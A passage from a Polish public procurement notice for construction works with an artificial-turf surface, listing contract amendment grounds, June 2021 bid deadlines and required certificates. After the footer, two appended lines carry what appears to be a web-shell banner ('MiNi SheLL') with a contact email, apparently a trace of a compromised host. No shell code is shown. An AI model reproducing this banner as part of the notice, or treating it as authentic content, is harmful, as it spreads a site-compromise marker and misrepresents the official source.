niezawinionych przez Wykonawcę Skutek – zmiana w umowie/aneks: Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót.<br/>6	Przyczyna/okoliczności:	Wystąpienie kolizji z niezinwentaryzowanymi urządzeniami podziemnymi, sieciami i instalacjami Skutek – zmiana w umowie/aneks: Zmiana terminu realizacji zamówienia o tyle dni ile trwało wstrzymanie robót związane z usunięciem kolizji.<br/>7	Przyczyna/okoliczności:	Potrzeba wykonania robót realizowanych na podstawie art. 455 ust. 1 pkt 3-4 i ust. 2 ustawy PZP.	Skutek – zmiana w umowie/aneks: Wydłużenie terminu realizacji zamówienia o tyle dni ile trwało wykonanie robót <br/>8	Przyczyna/okoliczności:	Zgłoszony przez Wykonawcę i potwierdzony przez Zamawiającego wpływ COVID-19 na należyte wykonanie umowy dotyczące w szczególności: <br/>1) nieobecności pracowników lub osób świadczących pracę za wynagrodzeniem na innej podstawie niż stosunek pracy, które uczestniczą lub mogłyby uczestniczyć w realizacji zamówienia;<br/>2) decyzji wydanych przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia państwowego wojewódzkiego inspektora sanitarnego, w związku z przeciwdziałaniem COVID-19, nakładających na wykonawcę obowiązek podjęcia określonych czynności zapobiegawczych lub kontrolnych;<br/>3) poleceń lub decyzji wydanych przez wojewodów, ministra właściwego do spraw zdrowia lub Prezesa Rady Ministrów, związanych z przeciwdziałaniem COVID-19, o których mowa w art. 11 ust. 1-3 ustawy z 2.03.2020r o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych Dz.U.2020 poz. 374 ze zm.<br/>4) wstrzymania dostaw produktów, komponentów produktu lub materiałów, trudności w dostępie do sprzętu lub trudności w realizacji usług transportowych;<br/>5) innych okoliczności, które uniemożliwiają bądź w istotnym stopniu ograniczają możliwość wykonania umowy;<br/>6) okoliczności, o których mowa w pkt 1-5, w zakresie w jakim dotyczą one podwykonawcy lub dalszego podwykonawcy. Skutek – zmiana w umowie/aneks: Zmiana umowy w szczególności poprzez:<br/>1) zmianę terminu wykonania umowy lub jej części, lub czasowe zawieszenie wykonywania umowy lub jej części,<br/>2)zmianę sposobu wykonywania dostaw, usług lub robót budowlanych,<br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia wynagrodzenia wykonawcy, o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z załącznikami za pośrednictwem platformy zakupowej pod adresem: https://zory.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-10 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Najpóźniej w dniu podpisania umowy wybrany wykonawca zobowiązany jest do dostarczenia niżej wymienionych dokumentów dotyczących oferowanej nawierzchni ze sztucznej trawy: <br/>a)	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1,<br/>b)	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.<br/>c)	Aktualny Atest Państwowego Zakładu Higieny lub równoważnej instytucji z państwa członkowskiego Unii Europejskiej dla oferowanej nawierzchni.<br/>d)	Autoryzacja producenta nawierzchni ze sztucznej trawy, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem 60 miesięcznej gwarancji udzielonej przez producenta na tę nawierzchnię.<br/>Dostarczone dokumenty będą podlegać formalnej akceptacji przez Zamawiającego. Niedostarczenie dokumentów lub odmowa ich poprawy lub uzupełnienia będzie potraktowana jako odmowa podpisania umowy z winy Wykonawcy i skutkować będzie zatrzymaniem wadium.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-26 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com